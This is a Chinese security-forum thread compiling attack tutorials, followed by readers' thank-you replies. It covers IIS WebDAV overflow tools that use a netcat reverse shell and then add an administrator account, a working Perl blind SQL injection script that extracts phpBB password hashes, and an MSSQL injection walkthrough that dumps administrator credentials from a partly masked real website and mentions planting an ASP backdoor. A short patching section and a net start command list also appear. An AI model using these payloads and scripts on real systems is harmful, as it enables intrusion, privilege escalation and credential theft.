简介:wb.exe是一个win32平台下已经编译好的针对英文版的IIS--webdav远程溢出攻击
程序,原代码的作者是Crpt的kralor,使用时行用Netcat在本地监听某个端口,如nc -L -p 666,然后使用此程序对远程主机进行溢出攻击,溢出成功后就能在本地监听口上获取远程主机的反向连接,获取localsystem权限的cmdshell,它需要指定远程主机反向连接主机IP、端口、补丁信息等参数:syntax: c:\K_WEBDAV.EXE<victim_host><your_host><your_port>[padding],如wb targetserver.com your_ip 666 3 ,攻击如果成功,那Netcat的监听窗口就会出现远程主机的shell。
2、 第二个溢出程序:webdavx.exe
下载地址http://www.longker.dom/txt/opensoft.asp?soft_id=135&;;url=1
简介:webdavx.exe是一个针对中文版server溢出程序,它是根据安全焦点Isno的perl代码编译成
的,这个版本只对中文版的有效,它的使用也不同于wb.exe,它溢出成功后直接在目标主机的7788端口上捆定一个localsystem权限的cmdshell,不像wb.exe需要反向连接,入侵者只要telnet到7788端口就可以了,所以用它在局域网内也能对局域网的主机进行攻击,当然wb.exe使用反向连接也有它的好处,因为许多WEB服务器的防火墙都设置为只允许通过到端口80的TCP连接,这样即使开了7788端口你也连接不上,而使用反向连接可以突破防火墙的TCP过滤,所以这两个软件各有用处各有特点,可以根据不同的需要进行选择。
3、 测试攻击实例
虽然讲了两个攻击软件的用法,但都只是纸上谈兵,我们还是来实际测试一下这个漏洞的威力如何!
我们测试的是中文版的IIS主机,使用的扫描软件是WebDAVScan的汉化版,攻击软件是webdavx.exe,为了输入方便,我把webdavx.exe改名为web.exe,在刚才介绍WebDAVScan 的时候我们已经扫描到的IIS支持WebDAV的主机中选一台,找开CMD,输入:



c:\web 2x..x.23.68
send buffer…(正在溢出)

telnet target 7788(溢出完成,请尝试telnet连接目标主机的7788端口)

c:\telnet 2x..x.23.68 7788
正在连接到2x..x.23.68…
Microsoft Windows 2000[Version 5.00.2195]

<C>版权所有制1985-2000Microsoft Corp
c:\winnt\system32> (溢出成功,已经连接到其7788端口)



当然事情上溢出不一定成功,如果telnet连接提示失败就说明溢出可能不成功,这里是笔者N次试验的结果,不过现在webdavx.exe的溢出代码重新进行了改进,其溢出成功率大幅提高,估计在1/2左右。而且得到的应该是system权限,比超级用户还高一级,可以加个administrator组的成员来试试:
c:\winnt\system32>net user hacker 111111 /add
The command completed successfully
C:\winnt\system32>net localgroup administrators hacker /add
The command completed successfully
命令成功了,看来System权限是真的了,那不是可在机器上干任何事情了?还真有点可怕!好了,我们这里只是测试,到此就停止吧!
三、 漏洞消除方案
我们上面已经看到了WebDAV远程溢出攻击的威力了吧,而到本文截稿为止,国内网络上的WebDAV远
程溢出攻击是越来越多了,你的IIS服务器一不小心就有可能被黑客攻击而成为被控制的傀儡,所以管理员和用户们千万不能大意,一定要尽快地堵上这个漏洞,千万不能再重演像MSSQL的远程溢出漏洞那样的惨痛教训了。具体的可以通过以下几个方案来解决:
⑴ 安装补丁,目前微软已经提供了此漏洞的补丁,下载地址http://microsoft.com/downloads/
details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=en
或者,你也可以作用微软提供的IIS Lockdown工具来防止该漏洞被利用。
⑵ 如果你不能立刻安装补丁或升级,也可以手工修补这个漏洞,我们上面已经说了WebDAV功能对一般的Web服务器来说并不需要,所以可以把它停止掉。WebDAV在IIS 5.0 WEB服务器上的实现是由Httpext.dll完成,默认安装,但是简单更改Httpext.ell不能修正此漏洞,因为WINDOWS 2000的WFP功能会防止系统重要文件破坏或删除。要完全关闭WebDAV包括的PUT和DELETE请求,需要对注册表进行如下更改:
启动注册表编辑器,搜索注册表中的如下键:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters
找到后点击"编辑"菜单,点击"增加值",然后增加如下注册表键值:
value name: DisableWebDAV
Data typeWORD
value data: 1
最后别忘了重新启动IIS,只有重启IIS后新的设置才会生效
































NET START可以起用命令一览表


Net start
启动服务,或显示已启动服务的列表。两个或多个词组成的服务名,例如 Net Logon 或 Co
mputer Browser,必须两边加引号 (")。
net start [service]
参数

键入不带参数的 net start 显示正在运行服务的列表。
service
包括 alerter、client service for netware、clipbook server、content index、comput
er browser、dhcp client、directory replicator、eventlog、ftp publishing service、
hypermedia object manager、logical disk manager、lpdsvc、media services managemen
t, messenger、Fax Service、Microsoft install server、net logon、network dde、netw
ork dde dsdm、nt lm security support provider、ole、plug and play、remote access
connection manager、remote access isnsap service、remote access server、remote pr
ocedure call (rpc) locator、remote procedure call (rpc) service、schedule、server
、simple tcp/ip services、site server ldap service、smartcard resource manager、s
nmp、spooler、task scheduler、tcp/ip netbios helper、telephony service、tracking
service、tracking (server) service、ups、Windows time service 和 workstation。
下面服务只有在 Windows 2000 上可用:file service for macintosh、gateway service
for netware、microsoft dhcp service、print service for macintosh、windows interne
t name service。

Net start Alerter
启动“警报器”服务。“警报器”服务发送警告消息。
Net start Alerter
Net start Client Service for NetWare
启动“NetWare 客户服务”。该命令只有在安装了 NetWare 客户服务的情况下才能在 Wind
ows 2000 Professional 上使用。
net start "client service for netware"
Net start ClipBook Server
启动“剪贴簿服务器”服务。两个单词组成的服务名,例如 ClipBook Server,必须两边加
引号 (")。
net start "clipbook server"

Net start Computer Browser
启动“计算机浏览器”服务。
net start "computer browser"

Net start DHCP Client
启动“DHCP 客户”服务。该命令只有在安装了 TCP/IP 协议之后才可用。
net start "dhcp client"

Net start Directory Replicator
启动“目录复制程序”服务。“目录复制程序”服务将指定的文件复制到指定服务器上。两
个词组成的服务名,例如 Directory Replicator,必须两边加引号 (")。也可以用命令 net
start replicator 启动该服务。
net start "directory replicator"

Net start Eventlog
启动“事件日志”服务,该服务将事件记录在本地计算机上。必须在使用事件查看器查看记
录的事件之前启动该服务。
net start Eventlog

Net start File Server for Macintosh
启动 Macintosh 文件服务,允许 Macintosh 计算机使用共享文件。该命令只能在运行 Win
dows 2000 Server 的计算机上可用。
net start "file service for macintosh"
Net start FTP Publishing Service
启动 FTP 发布服务。该命令只有在安装了 Internet 信息服务后才可用。
net start "ftp publishing service"
Net start Gateway Service for NetWare
启动 NetWare 网关服务。该命令只有在安装了 NetWare 网关服务的情况下才能在 Windows
2000 Server 上可用。
net start "gateway service for netware"
Net start Lpdsvc
启动 TCP/IP 打印服务器服务。该命令只有在 UNIX 打印服务和 TCP/IP 协议安装后方可使
用。
net start lpdsvc

Net start Messenger
启动“信使”服务。“信使”服务允许计算机接收邮件。
net start messenger

Net start Microsoft DHCP Service
启动 Microsoft DHCP 服务。该命令只有在运行 Windows 2000 Server 并且已安装 TCP/IP
协议和 DHCP 服务的情况下才可用。
net start "microsoft dhcp service"

Net start Net Logon
启动“网络登录”服务。“网络登录”服务验证登录请求并控制复制用户帐户数据库域宽。
两个词组成的服务名,例如 Net Logon,必须两边加引号 (")。该服务也可以使用命令 net
start netlogon 启动。
net start "net logon"

Net start Network DDE
启动“网络 DDE”服务。
net start "network dde"
Net start NT LM Security Support Provider
启动“NT LM 安全支持提供程序”服务。该命令只有在安装了“NT LM 安全支持提供程序”
后才可用。
net start "nt lm security support provider"
Net start OLE
启动对象链接和嵌入服务。
net start ole
Net start Print Server for Macintosh
启动 Macintosh 打印服务器服务,允许从 Macintosh 计算机打印。该命令只能在运行 Win
dows 2000 Server 的计算机上可用。
net start "print server for macintosh"
Net start Remote Access Connection Manager
启动“远程访问连接管理器”服务。该命令只有在安装了“远程访问服务”后才可用。
net start "remote access connection manager"
Net start Remote Access ISNSAP Service
启动“远程访问 ISNSAP 服务”。该命令只有在安装了“远程访问服务”后才可用。
net start "remote access isnsap service"
Net start Remote Procedure Call (RPC) Locator
启动 RPC 定位器服务。“定位器”服务是 Microsoft Windows 2000 的 RPC 名称服务。
net start "remote procedure call (rpc) locator"

Net start Remote Procedure Call (RPC) Service
启动“远程过程调用 (RPC) 服务”。“远程过程调用 (RPC) 服务”是 Microsoft Windows
2000 的 RPC 子系统。RPC 子系统包括终结点映射器和其他各种 RPC 服务。
net start "remote procedure call (rpc) service"

Net start Schedule
启动“计划”服务。“计划”服务使计算机可以使用 at 命令在指定时间启动程序。
net start schedule

Net start Server
启动“服务器”服务。“服务器”服务使计算机可以共享网络上的资源。
net start server

Net start Simple TCP/IP Services
启动“简单 TCP/IP 服务”服务。该命令只有在安装了 TCP/IP 和“简单 TCP/IP 服务”后
才可以使用。
net start "simple tcp/ip services"
Net start Site Server LDAP Service
启动“Site Server LDAP 服务”。“Site Server LDAP 服务”在 Windows 2000 Active D
irectory 中发布 IP 多播会议。该命令只有在安装了“Site Server LDAP 服务”后才可以使
用。
net start "site server ldap service"

Net start SNMP
启动 SNMP 服务。SNMP 服务允许服务器向 TCP/IP 网络上的 SNMP 管理系统报告当前状态。
该命令只有在安装了 TCP/IP 和 SNMP 后才可以使用。
net start snmp

Net start Spooler
启动“后台打印程序”。
net start spooler
Net start TCP/IP NetBIOS Helper
在 TCP 服务上启用 Netbios 支持。该命令只有在安装了 TCP/IP 才可用。
net start "tcp/ip netbios helper"
Net start UPS
启动“不间断电源 (UPS)”服务
net start ups

Net start Windows Internet Name Service
启动“Windows Internet 命名服务”。该命令只有在安装了 TCP/IP 和“Windows Interne
t 命名服务”后在 Windows 2000 Servers 上才可以使用。
net start "windows internet name service"

Net start Workstation
启动“工作站”服务。“工作站”服务使计算机可以连接并使用网络资源。
net start workstation
Net start Schedule
有的地方称为“定时”服务,叫法不同,请大家注意了,其实是一回事!
Net start Telnet
启动telnet服务,打开23端口,有的情况下需先运行NTLM.exe。为什么?到榕G的说明里去找
吧!
net start workstation
打开NET USE
net start lanmanserver
打开 IPC 服务。
开FTP命令是:net start msftpsvc
Net start
启动服务,或显示已启动服务的列表。两个或多个词组成的服务名,例如 Net Logon 或 Co
mputer Browser,必须两边加引号 (")。
net start [service]
参数

键入不带参数的 net start 显示正在运行服务的列表。
service
包括 alerter、client service for netware、clipbook server、content index、comput
er browser、dhcp client、directory replicator、eventlog、ftp publishing service、
hypermedia object manager、logical disk manager、lpdsvc、media services managemen
t, messenger、Fax Service、Microsoft install server、net logon、network dde、netw
ork dde dsdm、nt lm security support provider、ole、plug and play、remote access
connection manager、remote access isnsap service、remote access server、remote pr
ocedure call (rpc) locator、remote procedure call (rpc) service、schedule、server
、simple tcp/ip services、site server ldap service、smartcard resource manager、s
nmp、spooler、task scheduler、tcp/ip netbios helper、telephony service、tracking
service、tracking (server) service、ups、Windows time service 和 workstation。
下面服务只有在 Windows 2000 上可用:file service for macintosh、gateway service
for netware、microsoft dhcp service、print service for macintosh、windows interne
t name service。

Net start Alerter
启动“警报器”服务。“警报器”服务发送警告消息。
Net start Alerter
Net start Client Service for NetWare
启动“NetWare 客户服务”。该命令只有在安装了 NetWare 客户服务的情况下才能在 Wind
ows 2000 Professional 上使用。
net start "client service for netware"
Net start ClipBook Server
启动“剪贴簿服务器”服务。两个单词组成的服务名,例如 ClipBook Server,必须两边加
引号 (")。
net start "clipbook server"

Net start Computer Browser
启动“计算机浏览器”服务。
net start "computer browser"












PHP注入实例

在网上很难看到一篇完整的关于php注入的文章和利用代码,于是我自已把mysql和php硬啃了几个星期,下面说说我的休会吧,希望能抛砖引玉!
相信大家对asp的注入已经是十分熟悉了,而对php的注入比asp要困难,因为php的magic_gpc选项确实让人头疼,在注入中不要出现引号,而php大多和mysql结合,而mysql的功能上的缺点,从另外一人角度看确在一定程度上防止了sql njection的攻击,我在这里就举一个实例吧,我以phpbb2.0为例:
在viewforum.php中有一个变量没过滤:
if ( isset($HTTP_GET_VARS<pOST_FORUM_URL]) ││ isset($HTTP_POST_VARS<pOST_FORUM_URL]) )
{
$forum_id = ( isset($HTTP_GET_VARS<pOST_FORUM_URL]) ) ? intval($HTTP_GET_VARS<pOST_FORUM_URL]): intval

($HTTP_POST_VARS<pOST_FORUM_URL]);
}
else if ( isset($HTTP_GET_VARS['forum']))
{
$forum_id = $HTTP_GET_VARS['forum'];
}
else
{
$forum_id = '';
}
就是这个forum,而下面直接把它放进了查询中:
if ( !empty($forum_id) )
{
$sql = "SELECT *
FROM " . FORUMS_TABLE . "
WHERE forum_id = $forum_id";
if ( !($result = $db->sql_query($sql)) )
{
message_die(GENERAL_ERROR, 'Could not obtain forums information', '', __LINE__, __FILE__, $sql);
}
}
else
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

如果是asp的话,相信很多人都会注入了.如果这个forum_id指定的论坛不存在的话,就会使$result为空,于是返回Could not obtain forums information的信息,于是下面的代码就不能执行下去了
//
// If the query doesn't return any rows this isn't a valid forum. Inform
// the user.
//
if ( !($forum_row = $db->sql_fetchrow($result)) )
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

//
// Start session management
//
$userdata = session_pagestart($user_ip, $forum_id) /****************************************

关键就是打星号的那一行了,这里是一个函数session_pagestart($user_ip, $thispage_id),这是在session.php中定义的一个函数,由于代码太

长,就不全贴出来了,有兴趣的可以自已看看,关键是这个函数还调用了session_begin(),函数调用如下session_begin($user_id, $user_ip,

$thispage_id, TRUE)),同样是在这个文件中定义的,其中有如下代码
$sql = "UPDATE " . SESSIONS_TABLE . "
SET session_user_id = $user_id, session_start = $current_time, session_time = $current_time, session_page =

$page_id, session_logged_in = $login
WHERE session_id = '" . $session_id . "'
AND session_ip = '$user_ip'";
if ( !($result = $db->sql_query($sql)) ││ !$db->sql_affectedrows() )
{
$session_id = md5(uniqid($user_ip));

$sql = "INSERT INTO " . SESSIONS_TABLE . "
(session_id, session_user_id, session_start, session_time, session_ip, session_page,

session_logged_in)
valueS ('$session_id', $user_id, $current_time, $current_time, '$user_ip', $page_id, $login)";
if ( !($result = $db->sql_query($sql)) )
{
message_die(CRITICAL_ERROR, 'Error creating new session : session_begin', '', __LINE__, __FILE__,

$sql);
}


在这里有个session_page在mysql中定义的是个整形数,他的値$page_id,也就是$forum_id,如果插入的不是整形就会报错了,就会出现Error

creating new session : session_begin的提示,所以要指这$forum_id的值很重要,所以我把它指定为:-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,1,1))=57,没有引号吧!虽然指定的是一个不存在的forum_id但他返回的查询结果可不一定是为空,这个就是猜user_id为2的用户的第一位密码的ascii码值是是否为57,如果是的话文章中第一段代码中的$result可不为空了,于是就执行了ession_pagestart这个有问题的函数,插入的不是整数当然就要出错了,于是就显示Error creating new session : session_begin,就表明你猜对了第一位了,其它位类似.

如果没有这句出错信息的话我想即使注入成功也很难判断是否已经成功,看来出错信息也很有帮助啊.分析就到这里,下面附上一段测试代码,这段代码只要稍加修改就能适用于其它类似的猜md5密码的情况,这里我用的英文版的返回条件,中文和其它语言的只要改一下返回条件就行了.

use HTTP::Request::Common;
use HTTP::Response;
use LWP::UserAgent;
$ua = new LWP::UserAgent;

print " ***********************
";
print " phpbb viewforum.php exp
";
print " code by pinkeyes
";
print " www.icehack.com
";
print " ************************
";
print "please enter the weak file's url:
";
print "e.g. http://192.168.1.4/phpBB2/viewforum.php
";
$adr=<STDIN>;
chomp($adr);
print "please enter the user_id that you want to crack
";
$u=<STDIN>;
chomp($u);
print "work starting,please wait!
";
@pink=(48..57);
@pink=(@pink,97..102);
for($j=1;$j<=32;$j++){
for ($i=0;$i<@pink;$i++){
$url=$adr."?forum=-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%

20user_id=$u%20and%20ord(substring(user_password,$j,1))=$pink[$i]";
$request = HTTP::Request->new('GET', "$url");
$response = $ua->request($request);

if ($response->is_success) {
if ($response->content =~ /Error creating new session/) {
$pwd.=chr($pink[$i]);
print "$pwd
";
}

}
}
}
if ($pwd ne ""){
print "successfully,The password is $pwd,good luck
";}
else{
print "bad luck,work failed!
";}

至于以前的phpbb2.0.6的search.php的问题利用程序只要将上面代码稍加修改就行了。

主要是看过程,学习作者思维!
SQL注入新技巧


SQL注入的新技巧
表名和字段名的获得
适用情况:
1)数据库是MSSQL
2)连接数据库的只是普通用户
3)不知道ASP源代码

可以进行的攻击
1)对数据内容进行添加,查看,更改

实例:
本文件以 http://www.dy***.com/user/wantpws.asp
为列进行测试攻击。

第一步:
在输入用户名处输入单引号,显示
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
字符串 ''' 之前有未闭合的引号。

/user/wantpws.asp,行63

说明没有过滤单引号且数据库是MSSQL.

第二步:
输入a';use master;--
显示
Microsoft OLE DB Provider for SQL Server 错误 '80040e21'
多步 OLE DB 操作产生错误。如果可能,请检查每个 OLE DB 状态值。没有工作被完成。

/user/wantpws.asp,行63
这样说明没有权限了。

第三步:
输入:a' or name like 'fff%';--
显示有一个叫ffff的用户哈。

第四步:
在用户名处输入
ffff' and 1<>(select count(email) from [user]);--
显示:
Microsoft OLE DB Provider for SQL Server 错误 '80040e37'
对象名 'user' 无效。

/user/wantpws.asp,行96

说明没有叫user的表,换成users试试成功,同时说明有一个叫email的列.
(东方飘云的一个办法是输入a' having 1=1--
一般返回如下也就可以直接得到表名和一个字段名了
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
列 'users.ID' 在选择列表中无效,因为该列未包含在聚合函数中,并且没有 GROUP BY 子句。

/user/wantpws.asp,行63


)

现在我们知道了ffff用户的密码是111111.

下面通过语句得到数据库中的所有表名和字段名。

第五步:
输入:
ffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--
说明:
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
通过查看ffff的用户资料可得第一个用表叫ad
然后根据表名ad得到这个表的ID
ffff';update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--
同上可知id是:581577110
由于对象标志id是根据由小到大排列的所以我们可以得到所有的用户表的名字了
象下面这样就可以得到第二个表的名字了
ffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--

ad 581577110
users 597577167
buy 613577224
car 629577281
learning 645577338
log 661577395
movie 677577452
movieurl 693577509
password 709577566
type 725577623
talk

经过一段时间的猜测后我们得到上面的分析一下应该明白password,users是最得要的

第六步:猜重要表的字段
输入:
现在就看看users表有哪些字段
ffff';update [users] set email=(select top 1 col_name(object_id('users'),3) from users) where name='ffff';--
得到第三个字段是password
ffff';update [users] set email=(select top 1 col_name(object_id('users'),4) from users) where name='ffff';--
得到第四个字段是name
最后users表的字段共28个全得到了
(注:另一个得到字段的办法,前提是系统的返回出错信息
a' group by ID having 1=1--
得到
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
列 'users.userid' 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。

/user/wantpws.asp,行63
这个第二个字段就是userid
显示第三个字段。
a' group by id,userid having 1=1--

Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
列 'users.password' 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。

/user/wantpws.asp,行63
得到是password
同理,一直显示出所有。:)
)

users表
1 2 3 4
id userid password name

5 6 7 8 9 10 11 12 13 14 15 16
Province homeaddress city adress starlook sex email nlook nos date money send

17 18 19 20 21 22 23 24 25 26 27 28
oklook dnlook lasthits phone askmejoin getmoney payno logintime mflag state post note


starlook--12 10 2003 2:41PM
nlook---0
nos---2 登陆次数
date--12 10 2003 12:00AM 注册时间?
money--同上
send--空
oklook--0
dnlook--0
getmoney--0
state--0
note--这家伙很。。。 说明

password表
1 2 3
id name pwd

然后我又试ad原来是用来记录广告击点的。。
然后又试password表得到有name和pwd字段。
执行
ffff';update [users] set email=(select top 1 name from password) where name='ffff';--
可得第一个用户名是admin123看样儿多半是管理员了。
然后又得到了密码是dy***dick188还是打星号算了哈哈...

这样我们就完全进入了这个电影网站的后台了哈哈。 http://www.dy***.com/login.asp

再进一步还可以知道管理员一共有三人密码也都能看到了。
ffff';update [users] set email=(select top 1 count(id) from password) where name='ffff';--
ffff';update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--

ffff';update [users] set email=(select top 1 name from password where id=2) where name='ffff';--


只是能免费看电影好象还不够哈..我看了看它的后台管理原来在
添加电影的地方对于上传的图片没有过滤.asa的文件,这样我就
能上传一个asp后门并执行.
(全文完)
晕死我都快要累死了请大家不要辜负我啊~学习下!你的技术一定很牛的




ok了,转自:黑基~~~~~~~~~~~~



















B24层 发表时间: 10-07-16 18:43

回复: siyuan [xiaosi2007]   论坛用户   登录
这个值得一看

B25层 发表时间: 10-10-08 15:10

回复: wucy365 [wucy365]   论坛用户   登录
这样的好东西,
该可以出一份完整的文档啦!

B26层 发表时间: 10-10-11 17:58

回复: icoa [icoa]   论坛用户   登录
好东西,慢慢看

B27层 发表时间: 10-10-21 10:46

回复: [q173044821]   论坛用户   登录

非常好!收藏了~

B28层 发表时间: 10-11-01 22:18

回复: 小枫 [a44553705]   论坛用户   登录
感谢分享!!

B29层 发表时间: 10-12-23 19:50

回复: 枯木二枝 [lrn1234]   论坛用户   登录
谢谢楼主..................

B30层 发表时间: 10-12-24 10:01

回复: 阳光幽灵 [amao3273]   论坛用户   登录
辛苦  不顶对不起你

B31层 发表时间: 10-12-28 17:57

回复: mengyu [mengyu]   论坛用户   登录
太给力,顶起!

B32层 发表时间: 11-03-18 20:05

回复: ljc [ljc666]   论坛用户   登录
辛苦,

B33层 发表时间: 11-05-02 19:30

回复: cd2010 [cd2010]   论坛用户   登录
恩恩 不错的帖子,顶了。

B34层 发表时间: 11-05-05 12:54

回复: [lqy520]   论坛用户   登录
实用啊

B35层 发表时间: 11-05-28 16:55

回复: 小菜鸟 [startfly]   论坛用户   登录
唉……对我来说认真看完也是一种考验,到更不用说是看明白了!看来我的进步空间确实是太大了。

B36层 发表时间: 11-05-29 13:34

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号